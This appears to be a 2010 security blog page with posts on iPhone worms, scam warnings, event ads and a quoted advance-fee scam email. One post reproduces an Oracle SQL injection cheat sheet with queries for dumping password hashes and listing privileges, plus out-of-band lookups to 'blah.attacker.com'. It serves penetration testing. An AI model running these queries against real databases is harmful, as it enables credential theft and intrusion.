onlinesecurityblog.info
[Online Security, Telco, Safety, Tips, Compliance, Standard]
IPhone / SmartPhone Security
Feb 8th
There has been several well known threats to the iPhone which include : -
- “Rick Astley” Rickrolling worm – non malicious; affects only jailbroken (Unlocked to specific carrier) iPhones which have not changed their default password. When an iPhone is Jailbroken, it installs an OpenSSH daemon (I found this very strange!) which is left running on the device. The worm itself only changes the background to a picture of Rick Astley (The 90’s pop star) with the words “ikee is never going to give you up”. Commonly referred to as either the Rickrolling or ikee worm.
- Second worm based on same vulnerability as the Rickrolling/ikee one is Malware which is named iPhone/Privacy.A. “This worm sits on a PC and scans the IP space for signs of a Wi-Fi-connected iPhone with the default SSH password. Once it finds one it siphons all the user’s personal data, including e-mail, contacts, photos and other data.”. This was identified by Intego MAC security software firm shortly after the ikee worm.
- http://blog.intego.com/2009/11/11/intego-security-memo-hacker-tool-copies-personal-info-from-iphones/
- A third worm is even more malicious and is a physhing attack (Probably will be called ING worm?) as it redirects users to a false ING website to try and extract client information from the victim. This has not been named and there may not yet be a fix for this apart from resetting the phone back to factory default..
- Charlie Miller / Blackhat 2009 demonstrated a SMS vulnerability where all iPhones were affected (Not just jailbroken phones). This exploits a vulnerability with the way the phone handles memory for SMS and largely is caused from a flood of SMS control messages to the phone which either crashes the phone/reboots or gives the attacker access to execute malicious code! This also affects Google’s Android operating system as well but not much detail with that. As I understand Apple have released patch for this to resolve the issue. More information here:
- http://arstechnica.com/apple/news/2009/07/apple-patching-critical-sms-vulnerability-in-iphone-os.ars
- Mid November iPhone Botnet – Again against ‘jailbroken’ iphones. There are many still actively trying to connect to the Botnet controller but this is down. I found some updated information on the XS4ALL site: http://www.xs4all.nl/veiligheid/security.php. XS4ALL security group found this botnet worm.
- Another “Jailbroken” “Ransomware” worm which a Dutch Hacker is using to exploit the SSH vulnerability. There is a fair bit of information on this I found on Intego as well. The hacker is trying to get money from people who are infected more information here on Intego as well.
There are vulnerability scanners which can detect Jailbroken phones (Beyond Security and Nessus). I am sure the other vulnerability scan vendors will also have method to detect a Jailbroken iphone. Much as the device is now a handheld PC it is susceptible to any vulnerabilities that hackers find, so is important to keep the devices updated from Apple updates much like we are used to with Windows PC’s. Most of these attacks are based on the SSH vulnerability for Jailbroken phones – users who have not changed the default password are at risk. The SMS attack though demonstrates that there can still be vulnerabilities in the non broken iphones as well.
I guess though from a Service Provider perspective if a user has Jailbroken their phone then that is their bad luck if they are attacked, though the cost of bills from such attacks particularly botnet type of threats may give customers some very high and unexpected usage bills! They say approximately 8% of iphones are Jailbroken, and that iPhones account for 50% of the smartphone market now.
I am still trying to find out if IDP/IDS devices can detect signatures based on iPhone attacks. This should be possible though I have not been able to find any specific information on signatures and weather these are effective means to combat these threats.
Security Directory @ Asia
Feb 6th
When you have important information, products, services, or just advertisements that you want to publish on the internet, you may have a website as a tool to promote it on the Internet. Nowadays, it has become an average to create a website when people want to build a business whether it is the small, medium, or large business. Now, for those of you who are involved in the security products or services, and want to make them so popular on the Internet, there is the best Security Directory for submitting your security matters including blog, device, advice, and much more. It is www.securitydirectory.asia and it’s the best directory to submit anything about security. www.securitydirectory.asia can help you popularize your website or blog.
www.securitydirectory.asia has several security categories for you such as Advisories & Patches, Authentication, Blog, Physical, Firewall, Malicious Software, and more. Therefore, if you have information about security as mentioned in the categories of www.securitydirectory.asia, you can add the sites to their directory so other people all around the world can get the information. Of course, if you have a website or blog about security product or service, www.securitydirectory.asia should be the best place to make your blog or website more popular. Even if you want to make your blog listed in the Featured Listings, you can get it at www.securitydirectory.asia.
www.securitydirectory.asia is the Security Directory, the largest information security directory on Asia Region. I think now your blog or website can Get Listed in Security Directory, www.securitydirectory.asia, of course, when your blog or website is related to information security. Do not hesitate now to visit www.securitydirectory.asia to submit your website or blog.
Security Operation Center Related Job Offering
Feb 4th
Alchemy Security is hiring SOC Program Managers and Ops Leads in Phoenix, Minneapolis and Topeka. They’re looking for people who have experience running security intelligence analysis groups and SIEM. Please send CV’s to ps@alchemysecurity.com. These projects begin in February and March 2010. Principals only.
Oracle SQL Injection Cheat Sheet
Feb 3rd
http://pentestmonkey.net/blog/oracle-sql-injection-cheat-sheet/
| Version | SELECT banner FROM v$version WHERE banner LIKE ‘Oracle%’; SELECT banner FROM v$version WHERE banner LIKE ‘TNS%’; SELECT version FROM v$instance; |
| Comments | SELECT 1 FROM dual — comment – NB: SELECT statements must have a FROM clause in Oracle so we have to use the dummy table name ‘dual’ when we’re not actually selecting from a table. |
| Current User | SELECT user FROM dual |
| List Users | SELECT username FROM all_users ORDER BY username; SELECT name FROM sys.user$; — priv |
| List Password Hashes | SELECT name, password, astatus FROM sys.user$ — priv, <= 10g. astatus tells you if acct is locked SELECT name,spare4 FROM sys.user$ — priv, 11g |
| List Privileges | SELECT * FROM session_privs; — current privs SELECT * FROM dba_sys_privs WHERE grantee = ‘DBSNMP’; — priv, list a user’s privs SELECT grantee FROM dba_sys_privs WHERE privilege = ‘SELECT ANY DICTIONARY’; — priv, find users with a particular priv SELECT GRANTEE, GRANTED_ROLE FROM DBA_ROLE_PRIVS; |
| List DBA Accounts | SELECT DISTINCT grantee FROM dba_sys_privs WHERE ADMIN_OPTION = ‘YES’; — priv, list DBAs, DBA roles |
| Current Database | SELECT global_name FROM global_name; SELECT name FROM v$database; SELECT instance_name FROM v$instance; SELECT SYS.DATABASE_NAME FROM DUAL; |
| List Databases | SELECT DISTINCT owner FROM all_tables; — list schemas (one per user) – Also query TNS listener for other databases. See tnscmd (services | status). |
| List Columns | SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’; SELECT column_name FROM all_tab_columns WHERE table_name = ‘blah’ and owner = ‘foo’; |
| List Tables | SELECT table_name FROM all_tables; SELECT owner, table_name FROM all_tables; |
| Find Tables From Column Name | SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE ‘%PASS%’; — NB: table names are upper case |
| Select Nth Row | SELECT username FROM (SELECT ROWNUM r, username FROM all_users ORDER BY username) WHERE r=9; — gets 9th row (rows numbered from 1) |
| Select Nth Char | SELECT substr(‘abcd’, 3, 1) FROM dual; — gets 3rd character, ‘c’ |
| Bitwise AND | SELECT bitand(6,2) FROM dual; — returns 2 SELECT bitand(6,1) FROM dual; — returns0 |
| ASCII Value -> Char | SELECT chr(65) FROM dual; — returns A |
| Char -> ASCII Value | SELECT ascii(‘A’) FROM dual; — returns 65 |
| Casting | SELECT CAST(1 AS char) FROM dual; SELECT CAST(‘1′ AS int) FROM dual; |
| String Concatenation | SELECT ‘A’ || ‘B’ FROM dual; — returns AB |
| If Statement | BEGIN IF 1=1 THEN dbms_lock.sleep(3); ELSE dbms_lock.sleep(0); END IF; END; — doesn’t play well with SELECT statements |
| Case Statement | SELECT CASE WHEN 1=1 THEN 1 ELSE 2 END FROM dual; — returns 1 SELECT CASE WHEN 1=2 THEN 1 ELSE 2 END FROM dual; — returns 2 |
| Avoiding Quotes | SELECT chr(65) || chr(66) FROM dual; — returns AB |
| Time Delay | BEGIN DBMS_LOCK.SLEEP(5); END; — priv, can’t seem to embed this in a SELECT SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — if reverse looks are slow SELECT UTL_INADDR.get_host_address(‘blah.attacker.com’) FROM dual; — if forward lookups are slow SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; — if outbound TCP is filtered / slow – Also see Heavy Queries to create a time delay |
| Make DNS Requests | SELECT UTL_INADDR.get_host_address(‘google.com’) FROM dual; SELECT UTL_HTTP.REQUEST(‘http://google.com’) FROM dual; |
| Command Execution | Java can be used to execute commands if it’s installed.
ExtProc can sometimes be used too, though it normally failed for me. |
| Local File Access | UTL_FILE can sometimes be used. Check that the following is non-null: SELECT value FROM v$parameter2 WHERE name = ‘utl_file_dir’; Java can be used to read and write files if it’s installed (it is not available in Oracle Express). |
| Hostname, IP Address | SELECT UTL_INADDR.get_host_name FROM dual; SELECT host_name FROM v$instance; SELECT UTL_INADDR.get_host_address FROM dual; — gets IP address SELECT UTL_INADDR.get_host_name(‘10.0.0.1′) FROM dual; — gets hostnames |
| Location of DB files | SELECT name FROM V$DATAFILE; |
Live Hacking 2010 Europe Workshop
Feb 2nd
The Live Hacking 2010 Europe workshop will be held in Prague, Czech Republic from March 16th to 18th, 2010. This ethical hackers training course will be conducted by Dr. Ali Jahangiri based on his new book ’Live Hacking: The Ultimate Guide to Hacking Techniques and Countermeasures for Ethical Hackers and IT Security Experts’.
Dr. Ali Jahangiri, the world-renowned information security and ethical hacking expert, is pleased to announce the Live Hacking 2010 Europe workshop – a definitive and comprehensive workshop for White-hat computer hacking. Based on his new book ’Live Hacking: The Ultimate Guide to Hacking Techniques and Countermeasures for Ethical Hackers and IT Security Experts’, the workshop will be held in Prague, Czech Republic from March 16th to 18th, 2010.
This practical workshop is designed to introduce IT professionals to the world of hacking and information security and give them the knowledge they need to thwart the criminal elements in cyberspace. Attendees will need to bring their own laptop and using virtual machines the participants will learn to hack and crack using the techniques and tools of real hackers.
More info at here
Google, Adobe and Juniper get owned by IE Vulnerability
Jan 19th
Google said the attacks were very targeted and resulted in the theft of intellectual property. Adobe confirmed its network was also breached in the same attacks but did not provide any details on what was stolen.
In a statement, Juniper Network said it was investigating “a cyber security incident involving a sophisticated and targeted attack against a number of companies.”
According to public chatter, the attackers originated in Taiwan and included a hijacked Internet addressed owned by Rackspace. The hosting firm has confirmed that its systems “played a very small part” in the attacks.
Details on the cyber-attacks are beginning to trickle out. According to Dan Kaminsky, a security researcher who was briefed on the IE vulnerability used in one of the attacks, the exploit was targeted at a Windows XP machine running Internet Explorer 6.
EMAIL SCAM – What should you do?
Jan 18th
- Do not respond to any unsolicited (spam) incoming e-mails, including clicking links contained within those messages.
- Be skeptical of individuals representing themselves as surviving victims or officials asking for donations via e-mail or social networking sites.
- Verify the legitimacy of nonprofit organizations by utilizing various Internet-based resources that may assist in confirming the group’s existence and its nonprofit status rather than following a purported link to the site.
- Be cautious of e-mails that claim to show pictures of the disaster areas in attached files because the files may contain viruses. Only open attachments from known senders.
- Make contributions directly to known organizations rather than relying on others to make the donation on your behalf to ensure contributions are received and used for intended purposes.
- Do not give your personal or financial information to anyone who solicits contributions: Providing such information may compromise your identity and make you vulnerable to identity theft.
CyberSecurity RSA Conference 9 Feb 2010
Jan 14th
The 1st CyberSecurity RSA Security Conference in Malaysia will be held on 9 Feb 2010 (Tue). This is a 1-day event and we have speakers like Sam Curry (CTO Marketing, RSA), Par Botes (CTO, EMC Asia & Japan), Steve Ledzian (Regional System Engineer Manager, Cisco System Asia), Freddie Tan (Chief Security Adviser, Microsoft), Adli Abdul Wahid (Sr. Specialist, MYCERT), Uantchern (Regional Managing Partner, Deloitte) and many more to deliver interesting topics and speeches on info-security risk.
Google Award – Email SCAM from China
Jan 6th
See spoofed email acting from goggle Award, but originated from China (mx2.sjtu.edu.cn)
Altrincham Cheshire,
WA14 1EP
London,
United Kingdom.
GOOGLE AWARDS.
We wish to congratulate you once again on this note, for being part of our winners selected this year. This promotion was set-up to encourage the active users of the Google search engine and the Google ancillary services.
Hence we do believe with your winning prize, you will continue to be active and patronage to the Google search engine.Google is now the biggest search engine worldwide and in an effort to make sure that it remains the most widely used search engine, we ran an online e-mail beta test which your email address won £450,000,00. We wish to formally announce to you that you have successfully passed the requirements, statutory obligations, verifications, validations and satisfactory report Test conducted for all online winners. You are advised to contact your Foreign Transfer Manager with the following details to avoid unnecessary delay and complications:
VERIFICATION AND FUNDS RELEASE FORM.
(1) Your contact address.
(2) Your Tel/Fax numbers.
(3) Your Nationality/Country.
(4) Your Full Name.
(5) Occupation/Age.
(6) Your Preferred Method of Receiving Your Prize (From Below)
Doctor Frank Smith
Email:frank_smith@sify.com
Tell: +447024091541
The Google Promotion Award Team has discovered a huge number of double claims due to winners informing close friends relatives and third parties about their winning and also sharing their pin numbers. As a result of this, these friends try to claim the lottery on behalf of the real winners. The Google Promotion Award Team has reached a decision from headquarters that any double claim discovered by the Lottery Board will result to the canceling of that particular winning, making a loss for both the double claimer and the real winner, as it is taken that the real winner was the informer to the double claimer about the lottery. So you are hereby strongly advised once more to keep your winnings strictly confidential until you claim your prize.
Sincerely,
Dr. Frank Smith.
Google Incorporations.
©2009 Google Incorporations
Full Email Header
From Google Awards Tue Jan 5 10:23:09 2010
| X-Apparently-To: | xxxxx@yahoo.com via 216.252.110.225; Tue, 05 Jan 2010 02:23:42 -0800 | |
| Return-Path: | <awards@google.com> | |
| X-YMailISG: | MEkBRj4WLDt7OmzBDSx091d2q9lSLF7GcWk0wwtofAGv_57DP5DVOfjditRtsRRiupu5e_ao6thZVdZMfALI3hzbNOZsYouprnPHuOFuBOcYbyxE7GGncd7Hpox.ukNfvaUGYdkqKmv6aiMHN7VN6SoBPfdgHhbjxD9h2rlUkgejDu6OxTGNPfUuJVt2RnAqepR_dvF7muua9gkgvEp_J7tSnTGOaobO_CE6wsmkqpMNrQIDXddI_.pzbDao4Lg6Cf57VZlRv5E8hOAN_pqCoYoLdGi9fxXsgtvU85R57VIqCtY6KFs5I812V9sc9nKkZfs4_rRLXAXoK6xmTgJoltSnxTmljZQ1gRKebhar_KPvWR0- | |
| X-Originating-IP: | [202.112.26.52] | |
| Authentication-Results: | mta1025.mail.sk1.yahoo.com from=google.com; domainkeys=neutral (no sig); from=google.com; dkim=neutral (no sig) | |
| Received: | from 127.0.0.1 (EHLO mx2.sjtu.edu.cn) (202.112.26.52) by mta1025.mail.sk1.yahoo.com with SMTP; Tue, 05 Jan 2010 02:23:41 -0800 | |
| Received: | from localhost (localhost [127.0.0.1]) by mx2.sjtu.edu.cn (Postfix) with ESMTP id E52E53772EE; Tue, 5 Jan 2010 18:23:32 +0800 (CST) | |
| X-Virus-Scanned: | Debian amavisd-new at sjtu.edu.cn | |
| Received: | from mx2.sjtu.edu.cn ([127.0.0.1]) by localhost (mx2.sjtu.edu.cn [127.0.0.1]) (amavisd-new, port 10024) with ESMTP id Z+t228yqjeHV; Tue, 5 Jan 2010 18:23:32 +0800 (CST) | |
| Received: | from User (unknown [203.147.45.60]) (Authenticated sender: wuxl@sjtu.edu.cn) by mx2.sjtu.edu.cn (Postfix) with ESMTP id 21EF33769F5; Tue, 5 Jan 2010 18:22:23 +0800 (CST) | |
| Reply-To: | <frank_smith@sify.com> | |
| From: |
“Google Awards”<awards@google.com>
|
|
| Subject: | contact specified claims agent | |
| Date: | Tue, 5 Jan 2010 10:23:09 -0000 | |
| MIME-Version: | 1.0 | |
| Content-Type: | multipart/mixed; boundary=”—-=_NextPart_000_0116_01C2A9A6.10195B7C” | |
| X-Priority: | 3 | |
| X-MSMail-Priority: | Normal | |
| X-Mailer: | Microsoft Outlook Express 6.00.2600.0000 | |
| X-MimeOLE: | Produced By Microsoft MimeOLE V6.00.2600.0000 | |
| Message-Id: | <20100105102224.21EF33769F5@mx2.sjtu.edu.cn> | |
| To: | undisclosed-recipients:; | |
| Content-Length: | 60876 |
Blackhat DC 2010
Jan 4th
Understanding the increasingly complex threats posed to an enterprise is a daunting task for today’s security professional. The knowledge to secure an enterprise against those threats is invaluable. Come to Black Hat learn from the industries best. Register for Black Hat DC today at www.blackhat.com.
